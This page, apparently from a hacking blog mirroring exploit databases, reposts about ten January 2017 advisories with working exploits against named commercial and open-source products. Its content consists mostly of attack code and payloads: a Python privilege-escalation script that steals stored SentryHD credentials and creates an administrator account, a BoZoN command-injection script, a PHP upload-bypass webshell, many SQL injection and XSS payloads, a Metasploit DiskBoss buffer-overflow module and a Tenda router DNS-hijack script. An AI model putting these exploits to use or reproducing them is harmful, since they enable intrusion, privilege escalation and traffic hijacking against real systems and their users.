Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153516

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
'''
# Exploit Title: SentryHD 02.01.12e Privilege Escalation
# Date: 18-01-2017
# Software Link: http://www.minutemanups.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: local
 
1. Description

Every user can read: c:\Program Files (x86)\SentryHD\config.ini.

Inside this ini file we can find login and password for web panel.

UPSMan is running on autostart as System.

Using Execute Command File we can execute commands on Scheduled system shutdown as System.

https://security.szurek.pl/sentryhd-020112e-privilege-escalation.html

2. Proof of Concept
'''

import ConfigParser
import hashlib
import re
import urllib2
import urllib
from cookielib import CookieJar
import os
import datetime
import subprocess
import time

new_user_name = "hacked"

print "SentryHD 02.01.12e Privilege Escalation"
print "by Kacper Szurek"
print "http://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"

config = ConfigParser.RawConfigParser()
config.read('c:\\Program Files (x86)\\SentryHD\\config.ini')

admin_user = config.get("Web", 'User0')
admin_password = config.get("Web", 'Password0')

print "[+] Find admin user: '{}' and password: '{}'".format(admin_user, admin_password)

cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

challenge = re.search("\"Challenge\" value=\"(.*?)\"", opener.open("http://localhost/").read())

formdata = { "Username" : admin_user, "Password": admin_password, "Challenge" : challenge, "Response":  hashlib.md5(admin_user+admin_password+challenge.group(1)).hexdigest()}
opener.open("http://localhost/delta/login", urllib.urlencode(formdata))

if "calcResponse()" in opener.open("http://localhost/home.asp").read():
	print "[-] Failed to login"
	os._exit(0)

bat_path = os.path.dirname(os.path.abspath(__file__))+"\\create_user.bat"
payload = open(bat_path, "w")
payload.write("net user {} /add\n".format(new_user_name))
payload.write("net localgroup Administrators {} /add".format(new_user_name))
payload.close()

print "[+] Create payload: {}".format(bat_path)

formdata = {"ACT_SHUT_TYPE":0, "ACT_UPS_DELAY":10, "ACT_PF_EN": "on", "ACT_OSD_PF":999, "ACT_BL_EN": "on", "ACT_OSD_BL":999, "ACT_SS_EN":"on","ACT_OSD_SS":999, "ACT_LS_EN":"on", "ACT_LS_DELAY":999, "SUB_SHUTDOWN":"Submit"}
opener.open("http://localhost/delta/mgnt_reaction", urllib.urlencode(formdata))

formdata = {"ACT_MSG_EN":1, "ACT_MSG_PERIOD":999, "ACT_CMD_EN":1, "ACT_CMD_FILE":bat_path, "ACT_CMD_BEFORE": 990, "SUB_REACTION":"Submit"}
opener.open("http://localhost/delta/mgnt_reaction", urllib.urlencode(formdata))


current_time = datetime.datetime.today()+datetime.timedelta(0,90)
shutdown_date = current_time.strftime('%m/%d/%Y')
shutdown_time = current_time.strftime('%H:%M')

formdata = {"SSH_SD1":shutdown_date, "SSH_TM1":shutdown_time, "SSH_ACT1":1}
opener.open("http://localhost/delta/mgnt_sschedule", urllib.urlencode(formdata))

print "[+] Set shutdown time: {} {}".format(shutdown_date, shutdown_time)

print "[+] Waiting for user creation"
i = 0
while True:
	if i > 100:
		print "[-] Exploit failed"
		os._exit(0)

	netuser, _ = subprocess.Popen("net users", stdout=subprocess.PIPE, stderr=None, shell=False).communicate()

	if new_user_name in netuser:
		break

	print "." ,
	time.sleep(2)
	i += i

print "\n[+] Account created, cancel shutdown"

formdata = {"SHUT_CANCEL":"Cancel Countdown"}
opener.open("http://localhost/delta/mgnt_control", urllib.urlencode(formdata))

print "[+] OK"
HireHackking 
# Title : Openexpert 0.5.17  - Sql Injection
# Author: Nassim Asrir
# Author Company: Henceforth
# Tested on: Winxp sp3 - win7
# Vendor: https://sourceforge.net/projects/law-expert/
# Download Software: https://sourceforge.net/projects/law-expert/files/

#################################################

## About The Product : ##

OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.

## Vulnerability : ## 

- Vulnerable Parametre : area_id

- HTTP Method : GET

- To exploit it : http://HOST/expert_wizard.php?area_id=1'

- Sqlmap Output : 

Parameter: area_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area_id=1 AND 4961=4961

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: area_id=1 AND SLEEP(5)
---
[15:35:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.26
back-end DBMS: MySQL >= 5.0
[15:35:38] [INFO] fetching database names
[15:35:39] [INFO] the SQL query used returns 5 entries
[15:35:39] [INFO] retrieved: information_schema
[15:35:39] [INFO] retrieved: mysql
[15:35:39] [INFO] retrieved: performance_schema
[15:35:39] [INFO] retrieved: sys
[15:35:39] [INFO] retrieved: test
HireHackking 
# Exploit Title: Check Box 2016 Q2 Survey Multiple Vulnerabilities
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 17, 2017
# Vendor Homepage: https://www.checkbox.com/
# Software Link: https://www.checkbox.com/free-checkbox-trial/
# Version: Check Box 2016 Q2,Check Box 2016 Q4  - Fixed in Checkbox Survey,
Inc. v6.7
# Tested on: Check Box 2016 Q2 Trial on windows Server 2012.
# Description : Checkbox is a survey application deployed by a number of
highly profiled companies and government entities like Microsoft, AT&T,
Vodafone, Deloitte, MTV, Virgin, U.S. State Department, U.S. Secret
Service,  U.S. Necular Regulatory Comission, UNAIDS, State Of California
and more!!

For a full list of their clients please visit:
https://www.checkbox.com/clients/

1- Directory traversal vulnerability : For example to download the
web.config file we can send a request as the following:
http://www.example.com/Checkbox/Upload.ashx?f=..\..\web.config&n=web.config

2- Direct Object Reference :
attachments to surveys can be accessed directly without login as the
following:
https://www.victim.com/Checkbox/ViewContent.aspx?contentId=5001
I created a script that can bruteforce the numbers to find ID's that will
download the attachment and you can easily write one on your own ;).

3- Open redirection in login page for example:
https://www.victim.com/Checkbox/Login.aspx?ReturnUrl=http://www.google.com

If you can't see why an open redirection is a problem in login page please
visit the following page:
https://www.asp.net/mvc/overview/security/preventing-
open-redirection-attacks


Timeline:
December 2016 - Discovered the vulnerability during Pen. Test conducted by
ZINAD IT for one of our clients.
Jan 12,2017 - Reported to vendor.
Jan 15,2017 - Sent a kind reminder to the vendor.
Jan 16,2017 - First Vendor Response said they will only consider directory
traversal as a vulnerability and that a fix will be sent in the next day.
Jan 16,2017 - Replied to explain why DOR and Open Redirect is a problem.
Jan 17,2017 - Patch Release Fixed the Directory Traversal.
Jan 17,2017 - Sent another email to confirm if DOR and open redirect wont
be fixed.
Jan 17,2017 - Open redirection confirmed to be fixed in the same patch
released before for DOR the vendor said they didn't believe that's a
security concern and that they have added a warning to let users know that
their attachments will be available to anyone with access to that survey page !!
HireHackking 
[+]##################################################################################################
[+] Credits / Discovery: John Page
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/BOZON-PRE-AUTH-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec       
[+]##################################################################################################
 


Vendor:
============
bozon.pw/en/



Product:
===========
BoZoN 2.4 

Bozon is a simple file-sharing app. Easy to install, free and open source Just copy BoZoN's files onto your server.


Vulnerability Type:
==========================
Pre-Auth Command Execution 



CVE Reference:
==============
N/A



Security Issue:
================

A Bozon vulnerability allows unauthenticated attackers to add arbitrary users and inject system commands to the "auto_restrict_users.php"
file of the Bozon web interface.

This issue results in arbitrary code execution on the affected host, attackers system commands will get written and stored to the PHP file
"auto_restrict_users.php" under the private/ directory of the Bozon application, making them persist. Remote attackers will get the command
responses from functions like phpinfo() as soon as the HTTP request has completed.

In addition when an admin or user logs in or the webpage gets reloaded the attackers commands are then executed as they are stored.
If a Command is not injected to the "auto_restrict_users.php" file, unauthenticated attackers can opt to add user accounts at will.



Exploit/POC:
=============

import urllib,urllib2,time

#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================

EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))

if EXPLOIT==1:
    CMD="Apparition"
else:
    CMD='"];$PWN=''phpinfo();//''//"'

if EXPLOIT != 0:
   url = 'http://'+IP+'/BoZoN-master/index.php'
   data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
   req = urllib2.Request(url, data)
   
response = urllib2.urlopen(req)
if EXPLOIT==1:
    print 'Apparition user account created! password: abc123'
else:
    print "Done!... waiting for phpinfo"
    time.sleep(0.5)
    print response.read()




Impact:
===============
System Takeover



Severity:
=========
High



Disclosure Timeline:
====================================
Vendor Notification: No Replies
January 17, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX
HireHackking 
+]###################################################################################################
[+] Credits / Discovery: John Page 	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt
[+] ISR: Apparition
[+]##################################################################################################



Vendor:
===============
sourceforge.net


Product:
===============
dirList v0.3.0


Download:
===========
sourceforge.net/projects/dir-list/


dirLIST displays files and folders in a given HTTP/FTP directory. It has a wonderful interface with choice of Thumbnail or List
view along with gorgeous icons for different file types. Includes a sleek gallery, web based mp3 player, file admin + more.



Vulnerability Type:
======================================
Bypass File Upload / CMD Execution



CVE Reference:
===============
N/A


Security Issue:
===============

When uploading "Banned" file types dirLIST replies with a base64 encoded error message.

e.g.
dXBsb2FkX2Jhbm5lZA== 

Decoded it reads, "upload_banned".


Banned files are setup in the "config.php" file.

$banned_file_types = array('.php', '.php3', '.php4', '.php5', '.htaccess', '.htpasswd', '.asp', '.aspx'); 

When upload a file, the check is made for banned file types.

In "process_upload.php" on Line: 47

if(in_array(strtolower(strrchr($file_name, ".")), $banned_file_types))
	{
		header("Location: ../index.php?folder=".$_POST['folder']."&err=".base64_encode("upload_banned"));
		exit;
	}


However, appending a semicolon ";" to end of our PHP file will skirt the security check allowing
us to upload a banned PHP file type, and our PHP file will be executed by server when accessed later.

Apache manual:
“Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr
maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. etc..

Therefore, a file named ‘file.php.1’, can be interpreted as a PHP file and be executed on server. 
This usually works if the last extension is not specified in the list of mime-types known to the web server. 

Developers are usually unaware of the "Apache" feature to process files with some odd unexpected extension like PHP.1, PHP.; and such.


Tested on:

Windows 7
Bitnami wampstack-5.6.29-0.
Apache/2.4.23 (Win64)

Linux
XAMPP 5.6.8-0
Apache/2.4.12 (Unix)



Exploit/POC:
============

1) Create a banned PHP file to upload named.

"TEST.php.;"

2) Upload to server using dirLIST. 


3) Done!


<?php
echo passthru('cat /etc/passwd');
?>

Result:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message
bus:/:/sbin/nologin avahi:x:70:70:Avahi
daemon:/:/sbin/nologin

etc...



Network Access:
===============
Remote



Impact:
=================
System Takeover



Severity:
===========
High


Disclosure Timeline:
=====================
Vendor Notification: No Replies
January 17, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX
HireHackking 
1. ADVISORY INFORMATION
========================================
Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities
Application: ManagEnegine Admanager
Remotely Exploitable: Yes
Authentication Required: Yes
Versions Affected: <= 6.5.40
Technology: Java
Vendor URL: https://www.manageengine.com/products/ad-manager/
Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection
Author: Mehmet Ince
Date of found: 08 Jan 2017

2. CREDIT
========================================
Those vulnerabilities was identified during internal penetration test
by Mehmet INCE from PRODAFT / INVICTUS.

3. DETAILS
========================================

3.1 Authenticated Second Order SQL Injection
-----------------------------------------
AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with /Report.do enpoint.
start function of DuplicateComputerLİstener class is as follow (Irrelevant part are omitted.)

public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean)
  {
    try
    {
      ... OMITTED ...

      this.attrbId = request.getParameter("attrId");
      this.tableName = request.getParameter("attrTabName");
      this.attrbName = request.getParameter("attrbColName");

      ... OMITTED ...
    }
    catch (Exception e)
    {
      e.printStackTrace();
    }
  }

It takes user input without validation and set it directly to the class variables such as tableName, attrbName.
And then deriveData function are going to be called with class variables that under the adversary control
during complatedAction function execution.

public void completedAction()
{
  if (this.updateDetails)
  {
    ... OMITTED ...

    deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName);

    ... OMITTED ...
  }
  ... OMITTED ...
}

deriveData function definition is as follow.

public void deriveData(String domainName, String attrbId, String attrbName, String tableName)
  {
    ArrayList list = new ArrayList();
    RelationalAPI relationalAPI = RelationalAPI.getInstance();
    Connection connection = null;
    try
    {
      TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName);
      ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName);
      String dataType = colDef.getDataType();
      String selctAttrbCol_defaultValue = "'-'";
      if (!dataType.equals("CHAR")) {
        ... OMITTED ...
      }
      String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;";
      if (!tableName.equalsIgnoreCase(this.baseTableName))
      {
        String selctAttrbCol = tableName + "." + attrbName;
        String parentAttrbCol = this.baseTableName + ".domain_name";

        String parentTable = this.baseTableName;String childTable = tableName;
        String parentJoinCol = this.baseTableName + ".object_guid";
        String childJoinCol = tableName + ".object_guid";

        String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid";

        query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;";
      }
      ArrayList result = getResult(query, attrbName);

      ArrayList subList = new ArrayList();
      if (result.size() > 0)
      {
        ... OMITTED ...
      }
      if (subList.size() > 0)
      {
        ... OMITTED ...

      }
      else
      {
        ... OMITTED ...
      }
    }
    catch (Exception e)
    {
      e.printStackTrace();
    }
  }

As you can see, database query built with user supplied variable without PDO/ORM.

POC URL : http://12.0.0.136:8080/Report.do?methodToCall=generateReport&action=Generate&domains=DC=acme,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name
Vulnerable Parameters: attrTabName, attrbColName

IMPORTANT NOTE:
Since whole process are being called as background job, there is no way to successfully exploitation
with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to
exfiltrate data with DNS queries.(http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281)

3.2 Reflected Cross-Site Scripting Issues
-----------------------------------------

Issue #1
POC URL : http://12.0.0.136:8080/ObjectProperties.do?selectedTab=home&guid={0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a
Parameters: domainName

Issue #2
POC URL: http://12.0.0.136:8080/DelegationAudit.do?methodToCall=finish&selectedTab=delegation&selectedTile=delegationAudit&action='"--></style></scRipt><scRipt>alert(0x03279A)</scRipt>&init=true
Vulnerable Parameters: action

Issue #3
POC URL: http://12.0.0.136:8080/HDTTemplates.do?technicianId=1&domainName='"--></style></scRipt><scRipt>alert(0x0328D0)</scRipt>
Vulnerable Parameters: domainName

Issue #4
POC URL: http://12.0.0.136:8080/jsp/reports/ExportReport.jsp?reportList=true&reportId=43&waadAccId=/'onload='alert(9)
Vulnerable Parameters: waadAccId

Issue #5
POC URL: http://12.0.0.136:8080/MgmtAutomation.do?selectedTab=automation&selectedTile=mgmtAutomation&methodToCall=scheduledAutomationCreation&actionType='"--></style></scRipt><scRipt>alert(0x02CB72)</scRipt>
Vulnerable Parameters: actionType

Issue #6
POC URL: http://12.0.0.136:8080/ObjectProperties.do?guid={0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"--></style></scRipt><scRipt>alert(0x013AEE)</scRipt>&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf=
Vulnerable Parameters: objectClass, domainName

Issue #7
POC URL: http://12.0.0.136:8080/PopupInputSelection.do?methodToCall=selectContainer&domainName='"--></style></scRipt><scRipt>alert(0x025A20)</scRipt>&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local
Vulnerable Parameters: domainName, id, container

Issue #8
POC URL: http://12.0.0.136:8080/Report.do?selectedTab=reports&methodToCall=report&init=true&reportTab='"--></style></scRipt><scRipt>alert(0x00AE90)</scRipt>&tileName=Compliance Reports
Vulnerable Parameters: reportTab, tileName, categoryId,

Issue #9
POC URL: http://12.0.0.136:8080/AdvancedFilter.do?beanName=ReportBean&domainName='"--></style></scRipt><scRipt>alert(0x0376D4)</scRipt>&distinguishedName=DC=acme,DC=local
Vulnerable Parameters: domainName, distinguishedName

Issue #10
POC URL: http://12.0.0.136:8080/ViewSIDs.do?domainName='"--></style></scRipt><scRipt>alert(0x041BA0)</scRipt>&permissionType=folder
Vulnerable Parameters: permissionType, domianName

Issue #11
POC URL: http://12.0.0.136:8080/computerList.do?defaultNamingContext=DC=acme,DC=local&textField='"--></style></scRipt><scRipt>alert(0x042402)</scRipt>
Vulnerable Parameters: textField

Issue #12
POC URL: http://12.0.0.136:8080/ViewObjects.do?defaultNamingContext=x'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false
Vulnerable Parameters: defaultNamingContext,modelName, showDomain

Issue #13
POC URL: http://12.0.0.136:8080/groupList.do?defaultNamingContext=DC=acme,DC=local&modifyType='"--></style></scRipt><scRipt>alert(0x0437B4)</scRipt>&beanName=undefined&type=single
Vulnerable Parameters: modifyType, beanName


4. TIMELINE
========================================
06 Jan 2017 - Netsparker identified several XSS vulnerabilities.
07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team.
07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team.
08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms.
09 Jan 2017 - Vendor notified.
09 Jan 2017 - Vendor acknowledge the report.
13 Jan 2017 - Vendor replied with patch.
13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team.
16 Jan 2017 - Advisory released (https://www.manageengine.com/products/ad-manager/release-notes.html)
HireHackking 
# # # # # 
# Vulnerability: Authentication Bypass
# Date: 16.01.2017
# Vendor Homepage: http://e-topbiz.com/
# Script Name:  Million Pixels 3
# Script Buy Now: http://www.e-topbiz.com/oprema/pages/millionpixels3.php
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Sofware Price and Demo : $1250
http://photo-sharing.itechscripts.com/

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>

-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vportal',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '40869']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x09\x0a\x0d\x20",
          'Space'      => 2000
        },
      'Targets'        =>
        [
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v7.5.12',
            {
              'Offset' => 2471,
              'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 05 2016',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    if res && res.code == 200
      if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /DiskBoss Enterprise/
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => '/'
      )

      if res && res.code == 200
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
          mytarget = targets[1]
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
          mytarget = targets[2]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    sploit =  make_nops(21)
    sploit << payload.encoded
    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
    sploit << [mytarget.ret].pack('V')
    sploit << rand_text_alpha(2500)

    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end
end
HireHackking 
#!/bin/bash
#
#   Tenda ADSL2/2+ Modem D840R
#   Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:  
#  The vulnerability exist in the web interface, which is 
#  accessible without authentication. 
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  The malicious code doesn't sleeping, he stalking..  
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "               Tenda ADSL2/2+ Modem D840R " 
        echo "           Unauthenticated Remote DNS Change Exploit"
        echo "  ==================================================================="
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
